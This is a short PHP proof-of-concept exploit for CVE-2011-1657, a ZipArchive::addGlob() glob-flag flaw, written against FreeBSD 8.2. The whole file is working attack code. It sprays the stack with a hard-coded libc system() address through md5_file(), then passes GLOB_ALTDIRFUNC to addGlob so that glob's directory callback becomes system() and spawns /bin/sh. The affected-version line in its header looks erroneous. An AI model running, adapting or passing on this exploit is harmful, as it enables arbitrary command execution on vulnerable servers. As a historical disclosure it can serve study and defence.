<?php
/* CVE-2011-1657: php <= 3.5.6 ZipArchive::addGlob() missing glob flags filtering
*
* Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
*
* (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
*/
/* Create a file for our md5_file() stack spray.
*/
$system_addr = "\x50\x78\x8d\x28"; /* FreeBSD 8.2-RELASE system() libc addr */
$own = fopen("owned", "w");
fwrite($own, str_repeat($system_addr, 4096/4));
fclose($own);
/* Fake zip, empty file is a valid zip.
*/
$path = "foo.zip";
unlink($path);
fopen($path, "a");
$nx=new ZipArchive();
$nx->open($path);
/* Lame stack spraying \o/
*/
md5_file("owned");
/* Bing. globbuf.gl_opendir() = system()
*/
$nx->addGlob("/bin/sh", 64);
?>